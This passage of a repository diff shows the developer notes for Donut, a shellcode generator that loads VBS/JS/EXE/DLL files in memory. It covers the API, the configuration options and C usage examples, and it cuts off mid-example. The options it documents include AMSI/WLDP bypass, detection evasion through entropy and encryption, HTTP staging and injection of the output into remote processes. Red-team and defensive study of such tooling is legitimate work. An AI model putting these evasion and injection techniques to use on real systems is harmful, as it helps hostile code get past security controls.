500 DEBUG: inmem_dotnet.c:356:FreeAssembly(): ICorRuntimeHost::Release
501 DEBUG: inmem_dotnet.c:362:FreeAssembly(): ICLRRuntimeInfo::Release
502 DEBUG: inmem_dotnet.c:368:FreeAssembly(): ICLRMetaHost::Release
503 DEBUG: payload.c:171:ThreadProc(): Erasing RW memory for instance
504 DEBUG: payload.c:174:ThreadProc(): Releasing RW memory for instance
505 </pre>
506
507 <p>Obviously you should be cautious with what files you decide to execute on your machine.</p>
508
509 </body>
510 </html>
+911
-0
docs/devnotes.md less more
0
1 <html>
2 <head>
3 <meta charset="utf-8">
4 </head>
5 <body>
6
7 <h2>Table of contents</h2>
8
9 <ol>
10 <li><a href="#intro">Introduction</a></li>
11 <li><a href="#api">Donut API</a></li>
12 <li><a href="#config">Donut Configuration</a></li>
13 <li><a href="#static">Static Example</a></li>
14 <li><a href="#dynamic">Dynamic Example</a></li>
15 <li><a href="#com">Donut Components</a></li>
16 <li><a href="#instance">Donut Instance</a></li>
17 <li><a href="#module">Donut Module</a></li>
18 <li><a href="#hashing">Win32 API Hashing</a></li>
19 <li><a href="#encryption">Symmetric Encryption</a></li>
20 <li><a href="#bypass">Bypasses for AMSI/WLDP</a></li>
21 <li><a href="#debug">Debugging The Generator and Loader</a></li>
22 <li><a href="#loader">Extending The Loader</a></li>
23 </ol>
24
25 <h2 id="intro">1. Introduction</h2>
26
27 <p>This document contains information useful to developers that want to integrate Donut into their own project or write their own generator in a different language. Static and dynamic examples in C are provided for Windows and Linux. There's also information about the internals of the generator and loader such as data structures, the hash algorithm for resolving API, how bypassing AMSI and WLDP works, the symmetric encryption, debugging the generator and loader. Finally, there's also some information on how to extend functionality of the loader itself.</p>
28
29 <h2 id="api">2. Donut API</h2>
30
31 <p>Shared/dynamic and static libraries for both Windows and Linux provide access to three API.</p>
32
33 <ol>
34
35 <li><code>int DonutCreate(PDONUT_CONFIG)</code></li>
36 <p>Builds the Donut shellcode/loader using settings stored in a <code>DONUT_CONFIG</code> structure.</p>
37
38 <li><code>int DonutDelete(PDONUT_CONFIG)</code></li>
39 <p>Releases any resources allocated by a successful call to <code>DonutCreate</code>.</p>
40
41 <li><code>const char* DonutError(int error)</code></li>
42 <p>Returns a description for an error code returned by <code>DonutCreate</code>.</p>
43
44 </ol>
45
46 <p>The Donut project already contains a generator in C. <a href="https://twitter.com/nixbyte">nixbyte</a> has written <a href="https://github.com/n1xbyte/donutCS">a generator in C#</a>. awgh has written <a href="https://github.com/Binject/go-donut/">a generator in Go</a> and <a href="https://twitter.com/byt3bl33d3r">byt3bl33d3r</a> has written a Python module already included with the source.</p>
47
48 <h2 id="config">3. Donut Configuration</h2>
49
50 <p>The minimum configuration required to build the loader is a path to a VBS/JS/EXE/DLL file that will be executed in-memory. If the file is a .NET DLL, a class and method are required. If the module will be stored on a HTTP server, a URL is required. The following structure is declared in donut.h and should be zero initialized prior to setting any member.</p>
51
52 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
53 uint32_t len<span style='color:#808030; '>,</span> zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original length of input file and compressed length</span>
54 <span style='color:#696969; '>// general / misc options for loader</span>
55 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture</span>
56 <span style='color:#800000; font-weight:bold; '>int</span> bypass<span style='color:#800080; '>;</span> <span style='color:#696969; '>// bypass option for AMSI/WDLP</span>
57 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine to use when compressing file via RtlCompressBuffer</span>
58 <span style='color:#800000; font-weight:bold; '>int</span> entropy<span style='color:#800080; '>;</span> <span style='color:#696969; '>// entropy/encryption level</span>
59 <span style='color:#800000; font-weight:bold; '>int</span> format<span style='color:#800080; '>;</span> <span style='color:#696969; '>// output format for loader</span>
60 <span style='color:#800000; font-weight:bold; '>int</span> exit_opt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// return to caller or invoke RtlExitUserProcess to terminate the host process</span>
61 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread. attempts to intercept calls to exit-related API</span>
62 uint64_t oep<span style='color:#800080; '>;</span> <span style='color:#696969; '>// original entrypoint of target host file</span>
63
64 <span style='color:#696969; '>// files in/out</span>
65 <span style='color:#800000; font-weight:bold; '>char</span> input<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of input file to read and load in-memory</span>
66 <span style='color:#800000; font-weight:bold; '>char</span> output<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of output file to save loader</span>
67
68 <span style='color:#696969; '>// .NET stuff</span>
69 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use for CLR</span>
70 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for .NET DLL/EXE</span>
71 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class with optional namespace for .NET DLL</span>
72 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method or DLL function to invoke for .NET DLL and unmanaged DLL</span>
73
74 <span style='color:#696969; '>// command line for DLL/EXE</span>
75 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line to use for unmanaged DLL/EXE and .NET DLL/EXE</span>
76 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// param is passed to DLL function without converting to unicode</span>
77
78 <span style='color:#696969; '>// HTTP/DNS staging information</span>
79 <span style='color:#800000; font-weight:bold; '>char</span> server<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be stored on remote HTTP server or DNS server</span>
80 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk for http stager</span>
81
82 <span style='color:#696969; '>// DONUT_MODULE</span>
83 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// VBS/JS/DLL/EXE</span>
84 <span style='color:#800000; font-weight:bold; '>int</span> mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
85 DONUT_MODULE <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_MODULE</span>
86
87 <span style='color:#696969; '>// DONUT_INSTANCE</span>
88 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_EMBED or DONUT_INSTANCE_HTTP</span>
89 <span style='color:#800000; font-weight:bold; '>int</span> inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
90 DONUT_INSTANCE <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to DONUT_INSTANCE</span>
91
92 <span style='color:#696969; '>// shellcode generated from configuration</span>
93 <span style='color:#800000; font-weight:bold; '>int</span> pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of loader/shellcode</span>
94 <span style='color:#800000; font-weight:bold; '>void</span><span style='color:#808030; '>*</span> pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to loader/shellcode</span>
95 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
96 </pre>
97
98 <p>The following table provides a description of each member.</p>
99
100 <table border="1">
101 <tr>
102 <th>Member</th>
103 <th>Description</th>
104 </tr>
105 <tr>
106 <td><code>len, zlen</code></td>
107 <td><var>len</var> holds the length of the file to execute in-memory. If compression is used, <var>zlen</var> will hold the length of file compressed.</td>
108 </tr>
109 <tr>
110 <td><code>arch</code></td>
111 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
112 </tr>
113 <tr>
114 <td><code>bypass</code></td>
115 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are <code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. <code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. <code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
116 </tr>
117 <tr>
118 <td><code>compress</code></td>
119 <td>Indicates if the input file should be compressed. Available engines are <code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports <code>DONUT_COMPRESS_LZNT1</code>, <code>DONUT_COMPRESS_XPRESS</code> and <code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
120 </tr>
121 <tr>
122 <td><code>entropy</code></td>
123 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are <code>DONUT_ENTROPY_NONE</code>, <code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and <code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
124 </tr>
125 <tr>
126 <td><code>format</code></td>
127 <td>Specifies the output format for the shellcode loader. Supported formats are <code>DONUT_FORMAT_BINARY</code>, <code>DONUT_FORMAT_BASE64</code>, <code>DONUT_FORMAT_RUBY</code>, <code>DONUT_FORMAT_C</code>, <code>DONUT_FORMAT_PYTHON</code>, <code>DONUT_FORMAT_POWERSHELL</code>, <code>DONUT_FORMAT_CSHARP</code> and <code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
128 </tr>
129 <tr>
130 <td><code>exit_opt</code></td>
131 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Set this to <code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
132 </tr>
133 <tr>
134 <td><code>thread</code></td>
135 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
136 </tr>
137 <tr>
138 <td><code>oep</code></td>
139 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
140 </tr>
141
142 <tr>
143 <td><code>input</code></td>
144 <td>The path of file to execute in-memory. VBS/JS/EXE/DLL files are supported.</td>
145 </tr>
146 <tr>
147 <td><code>output</code></td>
148 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
149 </tr>
150
151 <tr>
152 <td><code>runtime</code></td>
153 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
154 </tr>
155 <tr>
156 <td><code>domain</code></td>
157 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
158 </tr>
159 <tr>
160 <td><code>cls</code></td>
161 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
162 </tr>
163 <tr>
164 <td><code>method</code></td>
165 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
166 </tr>
167
168 <tr>
169 <td><code>param</code></td>
170 <td>String with a list of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
171 </tr>
172 <tr>
173 <td><code>unicode</code></td>
174 <td>By default, the <code>param</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
175 </tr>
176
177 <tr>
178 <td><code>server</code></td>
179 <td>If the instance <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
180 </tr>
181
182 <tr>
183 <td><code>modname</code></td>
184 <td>If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
185 </tr>
186 <tr>
187 <td><code>mod_type</code></td>
188 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
189 </tr>
190 <tr>
191 <td><code>mod_len</code></td>
192 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
193 </tr>
194 <tr>
195 <td><code>mod</code></td>
196 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_HTTP</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
197 </tr>
198
199 <tr>
200 <td><code>inst_type</code></td>
201 <td><code>DONUT_INSTANCE_EMBED</code> indicates a self-contained payload which means the file is embedded. <code>DONUT_INSTANCE_HTTP</code> indicates the file is stored on a remote HTTP server.</td>
202 </tr>
203 <tr>
204 <td><code>inst_len</code></td>
205 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
206 </tr>
207 <tr>
208 <td><code>inst</code></td>
209 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
210 </tr>
211
212 <tr>
213 <td><code>pic_len</code></td>
214 <td>The size of data pointed to by <code>pic</code>.</td>
215 </tr>
216 <tr>
217 <td><code>pic</code></td>
218 <td>Points to the loader/shellcode. This should be injected into a remote process.</td>
219 </tr>
220 </table>
221
222 <h2 id="static">4. Static Example</h2>
223
224 <p>The following is linked with the static library donut.lib on Windows or donut.a on Linux.</p>
225
226 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
227
228 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
229 DONUT_CONFIG c<span style='color:#800080; '>;</span>
230 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
231 <span style='color:#603000; '>FILE</span> <span style='color:#808030; '>*</span>out<span style='color:#800080; '>;</span>
232
233 <span style='color:#696969; '>// need at least a file</span>
234 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
235 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_static &lt;EXE></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
236 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
237 <span style='color:#800080; '>}</span>
238
239 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
240
241 <span style='color:#696969; '>// copy input file</span>
242 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
243
244 <span style='color:#696969; '>// default settings</span>
245 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
246 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
247 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
248 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
249 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
250 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
251 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
252 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
253 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
254
255 <span style='color:#696969; '>// generate the shellcode</span>
256 err <span style='color:#808030; '>=</span> DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
257 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
258 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
259 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
260 <span style='color:#800080; '>}</span>
261
262 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
263
264 DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
265 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
266 <span style='color:#800080; '>}</span>
267 </pre>
268
269 <h2 id="dynamic">5. Dynamic Example</h2>
270
271 <p>This example requires access to donut.dll on Windows or donut.so on Linux.</p>
272
273 <pre style='color:#000000;background:#ffffff;'><span style='color:#004a43; '>#</span><span style='color:#004a43; '>include </span><span style='color:#800000; '>"</span><span style='color:#40015a; '>donut.h</span><span style='color:#800000; '>"</span>
274
275 <span style='color:#800000; font-weight:bold; '>int</span> <span style='color:#400000; '>main</span><span style='color:#808030; '>(</span><span style='color:#800000; font-weight:bold; '>int</span> argc<span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>char</span> <span style='color:#808030; '>*</span>argv<span style='color:#808030; '>[</span><span style='color:#808030; '>]</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
276 DONUT_CONFIG c<span style='color:#800080; '>;</span>
277 <span style='color:#800000; font-weight:bold; '>int</span> err<span style='color:#800080; '>;</span>
278
279 <span style='color:#696969; '>// function pointers</span>
280 DonutCreate_t _DonutCreate<span style='color:#800080; '>;</span>
281 DonutDelete_t _DonutDelete<span style='color:#800080; '>;</span>
282 DonutError_t _DonutError<span style='color:#800080; '>;</span>
283
284 <span style='color:#696969; '>// need at least a file</span>
285 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>argc <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#008c00; '>2</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
286 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ usage: donut_dynamic &lt;file></span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
287 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
288 <span style='color:#800080; '>}</span>
289
290 <span style='color:#696969; '>// try load donut.dll or donut.so</span>
291 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>if</span><span style='color:#004a43; '> </span><span style='color:#004a43; '>defined</span><span style='color:#808030; '>(</span><span style='color:#004a43; '>WINDOWS</span><span style='color:#808030; '>)</span>
292 <span style='color:#603000; '>HMODULE</span> m <span style='color:#808030; '>=</span> <span style='color:#400000; '>LoadLibrary</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.dll</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
293 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
294 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
295 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
296 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> <span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
297
298 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
299 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
300 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
301 <span style='color:#800080; '>}</span>
302 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
303 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.dll.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
304 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
305 <span style='color:#800080; '>}</span>
306 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>else</span>
307 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>m <span style='color:#808030; '>=</span> dlopen<span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.so</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> RTLD_LAZY<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
308 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
309 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
310 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
311 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
312
313 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
314 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
315 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
